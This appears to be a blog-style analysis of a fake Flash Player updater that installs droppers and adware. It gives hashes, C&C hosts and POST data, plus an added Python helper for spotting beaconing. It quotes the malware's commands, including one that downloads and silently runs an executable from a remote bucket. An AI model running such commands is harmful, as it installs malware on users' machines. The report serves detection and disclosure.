Fake Flash Player Updater.. installs droppers, malware and advertising components.

I came across a bit of crap today which claimed to be a Flash Player Update when browsing a website; I'm not sure how the user ended up on it.

SHA256: 1047c747b1ae3fa34192c3851d358ed0c4369daf8e2c70fc9f2a3c0d256d16b1
VirusTotal Report / Malwr Report

Setup.exe – Signed with a valid certificate, S/N: "0e 92 3b 9c f6 0d a5 9f c3 a4 3a 87 a8 07 1f c2"

Publisher: Plugin Update S.L.
Product: taskhost
Original name: taskhost.exe
Internal name: taskhost.exe
File version: 5. 4. 5. 4

[Screenshot: clickyes program name]

When you run the file, in my case, it made the following requests:


Host: maxirg00.maxisrv.com []
inetnum: –
netname: OVH_69328147
descr: OVH Static IP
country: PL
The domain whois is protected with a privacy service.

Containing the following POST data:

data={"publisher": "638", "uid": "1420730682899BJjYYTITkj", "campaign": "1844", "lpd": "www.thefilesbox.com", "ip": "", "tt": "6176d2f3a243f29b0b25b2047636830f63c7c4ff", "fileName": "Setup", "requestHost": "e4lvdpezempl.v6kgr1d.com", "referer": "", "sbb_check": "['1']", "time": "2015/01/08 15:24:43", "userAgent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "osVersion": "0", "os": "Win7", "browser": "ch", "url": "", "usedBrowser": "ch", "sign": "uv9", "caption": "", "host": "domain.com", "carrier": "FastPlayerPro","version":"2.0.15","1":0,"2":0,"3":0,"4":0,"5":0,"6":0,"7":0,"8":1,"9":0,"10":0,"11":0,"12":0,"13":0,"14":1,"15":0,"17":0,"18":0,"19":0,"20":0,"21":0,"22":0,"23":1,"24":0,"25":0,"26":0,"27":0,"28":0,"29":0,"30":0,"31":1,"32":0,"33":0,"34":0,"35":0,"36":0,"37":0,"38":0,"39":0,"40":0,"41":0,"42":0,"TYPE":"TP"}

The domain in the above text, thefilesbox.com, is also registered using the same privacy service as the spamware domain. This domain doesn’t seem to be resolving right now though.

The server then responds with nearly 500 KB of data, which can be seen here: http://pastebin.mozilla.org/8231405

It looks like the behavior or junk installed might vary depending on what anti-viruses exist on the system.

What is quite funny is that one of the variables, gratitudeURL, has the phrase "Thank you for trusting us for your downloads". Given that they are just about to install a virus on your system, this seems a bit rich.
The domain it is hosted on, step-congrats.com, also has whois privacy applied by the same company as the other domains involved. The HTTP content is hosted at Amazon Web Services.

c:\windows\rcore.exe gets dumped into your system by one of the things it downloads.
VirusTotal Report / Malwr Report
SHA256: 6c378c52c4dfc12d09e937aa3e1ab75245a6a6c2c4ec7b1a46b9a28e29e7113f

[Screenshot: flash fake updater]

Every 60 seconds it continues to make contact with
Which replies with 7, MAXTHX,, 0.

The overall traffic pattern is very similar to botnet C&C-style communication.
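As an added example (not from the original post), here is a small Python helper that parses the data= check-in body shown above into its identifying fields and the numeric flags set to 1 (which look like environment checks; that reading is an assumption), and that flags hosts a client contacts at a near-constant interval, the 60-second beaconing described here. Sample input is constructed.

```python
import json
from statistics import mean, pstdev
from urllib.parse import parse_qs

# Constructed sample body in the shape seen in the post (values trimmed / invented).
SAMPLE_BODY = ('data={"publisher": "638", "campaign": "1844", "lpd": "www.thefilesbox.com", '
               '"requestHost": "e4lvdpezempl.v6kgr1d.com", "carrier": "FastPlayerPro", '
               '"version": "2.0.15", "8": 1, "9": 0, "14": 1, "23": 1, "31": 1, "TYPE": "TP"}')

KEYS = ("publisher", "campaign", "lpd", "requestHost", "carrier", "version", "TYPE")

def parse_checkin(body):
    """Split a 'data=<json>' form body into (identifying fields, list of numeric keys set to 1)."""
    payload = parse_qs(body, strict_parsing=True).get("data", [None])[0]
    if payload is None:
        raise ValueError("no data= field in body")
    obj = json.loads(payload)
    fields = {k: obj.get(k) for k in KEYS}
    # Numeric keys ("1".."42") carry 0/1 values; collect the ones that are set.
    flags = sorted(int(k) for k, v in obj.items() if k.isdigit() and v == 1)
    return fields, flags

def periodic_hosts(events, period=60.0, tolerance=5.0, min_hits=4):
    """Return hosts contacted with near-constant spacing close to `period` seconds.
    events: iterable of (timestamp_seconds, host) from a proxy or DNS log."""
    by_host = {}
    for ts, host in events:
        by_host.setdefault(host, []).append(ts)
    beaconing = []
    for host, times in by_host.items():
        times.sort()
        if len(times) < min_hits:
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        # Regular beacon: mean gap near the period and little jitter between hits.
        if abs(mean(gaps) - period) <= tolerance and pstdev(gaps) <= tolerance:
            beaconing.append(host)
    return sorted(beaconing)

if __name__ == "__main__":
    print(parse_checkin(SAMPLE_BODY))
```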

If you are stupid and accept the install / click next.. it then goes crazy with requests to random partners / installs.

[Screenshot: massive infection]

Commands such as the following are executed:
C:\Users\User\AppData\Local\Temp\nsa4AF6.tmp\check20.exe http://pepperware.s3.amazonaws.com/pepperzip/update/update.exe update.exe /S /A 10115

C:\Windows\system32\cmd.exe /c ""C:\Users\User\AppData\Local\Temp\2840.bat" "C:\Users\User\AppData\Local\Temp\cddc8884-cdfb-42d1-ac19-103343754823\setup.exe""

Other domains involved:

Hosted at Amazon Web Services. Domain whois protection by the same company as all the other domains.

Hosted at Amazon Web Services. Domain whois protection by the same company as all the other domains.

All the working domains seem to use the following DNS servers:

